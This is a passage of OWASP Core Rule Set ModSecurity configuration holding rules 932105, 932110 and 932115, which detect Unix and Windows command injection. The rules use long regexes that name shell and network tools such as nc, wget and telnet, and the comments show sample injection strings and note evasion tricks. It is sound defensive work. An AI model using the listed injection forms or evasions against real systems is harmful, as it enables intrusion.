(?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"
]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o
)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ "id:932105,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Unix Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ 
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows command injection ] # # This rule detects Windows shell command injections. # If you are not running Windows, it is safe to disable this rule. # # A command injection takes a form such as: # # foo.jpg&ver /r # foo.jpg|ver /r # # The vulnerability exists when an application executes a shell command # without proper input escaping/validation. # # To prevent false positives, we look for a 'starting sequence' that # precedes a command in CMD syntax, such as: ; | & ` # # Anatomy of the regexp: # # 1. Starting tokens # # ; ;cmd # \{ {cmd # \| |cmd # \|\| ||cmd # & &cmd # && &&cmd # \n \ncmd # \r \rcmd # ` `cmd # # 2. Command prefixes # # ( (cmd) # , ,cmd # @ @cmd # ' 'cmd' # " "cmd" # \s spacing+cmd # # 3. Paths # # [\w'\"\./]+/ /path/cmd # [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd # [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd # # 4. Quoting # # \" "cmd" # \^ ^cmd # # 5. Extension/switches # # \.[\"\^]*\w+ cmd.com, cmd.exe, etc. # /b cmd/h # # An effort is made to combat evasions by CMD syntax; for example, # the following strings are valid: c^md, @cmd, "c"md. ModSecurity # has a t:cmdLine transformation built-in to deal with some of these, # but unfortunately, that transformation replaces ';' characters (so # we cannot match on the start of a command) and '\' characters (so we # have trouble matching paths). This makes the regexp more complex. # # This rule is case-insensitive. 
# # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* # [regexp assembled from util/regexp-assemble/regexp-932110.txt] # (?:\.[\"\^]*\w+)?\b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c[\"\^]*o[\"\
^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b[\"\^]*t[\"\
^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ "id:932110,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Windows Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ 
tag:'application-multi',\ tag:'language-shell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Apache 2.2 requires configuration file lines to be under 8kB. # Therefore, some remaining commands have been split off to a separate rule. # For explanation of this rule, see rule 932110. # # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* # [regexp assembled from util/regexp-assemble/regexp-932115.txt] # (?:\.[\"\^]*\w+)?\b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w 
'\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^